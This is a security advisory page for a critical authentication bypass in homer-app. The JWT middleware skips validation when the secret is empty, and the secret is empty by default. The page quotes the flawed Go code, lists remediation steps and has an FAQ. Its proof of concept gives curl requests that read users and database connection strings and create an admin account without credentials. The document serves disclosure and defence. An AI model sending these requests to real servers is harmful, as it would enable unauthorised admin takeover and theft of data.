GHSA-rqcc-94gv-wjm9: Critical severity go/github.com/sipcapture/homer-app vulnerability

Published Oct 7, 2026
·
Updated

Summary Both JWT middleware functions (JWTMiddleware and JWTMiddlewareV4) immediately return next(c) when jwtSecret == "". The JWT secret defaults to an empty string. On a default installation, all protected API endpoints under /api/v1, /api/v3, and /api/v4 are completely unauthenticated.

Details coordinator/handlers/auth.go lines 298-304: go func (h Auth) JWTMiddleware() echo.MiddlewareFunc { return func(next echo.HandlerFunc) echo.HandlerFunc { return func(c echo.Context) error { if h.jwtSecret == "" { return next(c) // bypass — no validation performed }

coordinator/handlers/authv4helpers.go lines 177-182: go func (h Auth) JWTMiddlewareV4() echo.MiddlewareFunc { return func(next echo.HandlerFunc) echo.HandlerFunc { return func(c echo.Context) error { if h.jwtSecret == "" { return next(c) // same bypass

coordinator/coordinator.go lines 315-317: go if c.config.JWT.Secret != "" { protected.Use(authHandler.JWTMiddleware()) // middleware not even registered when secret is empty }

config/config.go line 845: Secret field struct tag has default:"". The example config ships a placeholder value, but the Go struct default (used when no config is provided) is empty.

PoC bash On a default Homer installation (no JWT secret configured), all protected routes are open: curl http://<homer-host>/api/v3/users Returns full user list with no credentials

curl http://<homer-host>/api/v3/databases Returns all database connection strings

curl -X POST http://<homer-host>/api/v3/users \ -H 'Content-Type: application/json' \ -d '{"username":"attacker","password":"pw","partid":10,"usergroup":"admin"}' Creates a new admin user with no credentials

Impact Missing Authentication for Critical Function (CWE-306). On a default Homer installation with no JWT secret configured, every admin API endpoint is completely unauthenticated. Attackers can read/write all configuration, users, database connections, and stored VoIP call data.

Fix Fail closed: if JWT.Secret is empty at startup, abort with a fatal error requiring the operator to set a strong secret. Remove the empty-string shortcircuit from both middleware functions: go if h.jwtSecret == "" { log.Fatal("coordinator.jwt.secret must be set to a non-empty value") }

If possible, please apply for a CVE number when posting.

Affected Software

1 affected componentFixes available
go/github.com/sipcapture/homer-app<0.0.0-20260625093330-5e90809657c9
0.0.0-20260625093330-5e90809657c9

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade go/github.com/sipcapture/homer-app to a version that resolves this vulnerability.

    Fixed in 0.0.0-20260625093330-5e90809657c9
  2. Configuration

    Configure JWT.Secret to a strong non-empty value; abort startup with a fatal error if the setting is empty.

    Homer coordinator JWT.Secret = strong non-empty secret
  3. Compensating control

    Remove the empty-string bypass from both JWTMiddleware and JWTMiddlewareV4 so protected API routes always perform JWT validation, and ensure the authentication middleware is registered even when the secret is empty.

Event History

Oct 7, 2026
Advisory Published
via GitHub·04:11 PM
Data Sourced
via GitHub·04:11 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

Which deployments are exposed?

Default installations are exposed because the JWT secret defaults to an empty string. Protected endpoints under /api/v1, /api/v3, and /api/v4 are unauthenticated when that secret is empty.

2

What does an attacker need to exploit this?

An attacker needs only network access to the affected API endpoints. No credentials, valid JWT, user interaction, or special conditions are required.

3

How can I determine whether my instance is affected?

Check the configured JWT secret. If it is empty or unset, JWT middleware is bypassed and, for the referenced coordinator configuration, is not registered for protected routes.

4

What can be done if patching cannot happen immediately?

Configure a non-empty JWT secret. The described bypass occurs specifically when the JWT secret is empty.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203